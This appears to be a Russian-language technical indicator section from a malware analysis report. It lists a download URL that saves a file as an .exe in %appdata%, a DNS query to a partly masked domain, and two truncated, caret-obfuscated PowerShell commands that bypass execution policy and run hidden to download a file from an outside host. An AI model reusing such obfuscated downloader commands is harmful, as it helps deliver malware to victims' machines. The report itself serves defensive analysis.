Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^wers^HE^ll.EXE -Ex^Ecut^iOnPo^L^icY^ BYPa^sS^ ^-^N^o^P^rO^fI^Le -Win^d^o^WSt^y^LE ^Hi^DDeN ^(^nEw^-oBJe^Ct^ SySTem^.N^E^t^.WeBCLIEn^t).Dow^nLo^aDfi^Le^('http://www.zoerpol...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pO^wers^HE^ll.EXE -Ex^Ecut^iOnPo^L^icY^ BYPa^sS^ ^-^N^o^P^rO^fI^Le -Win^d^o^WSt^y^LE ^Hi^DDeN ^(^nEw^-oBJe^Ct^ SySTem^.N^E^t^.WeBCLIEn^t).Dow^nLo^aDfi^Le^('http://www.zoerpol...' (со скрытым окном)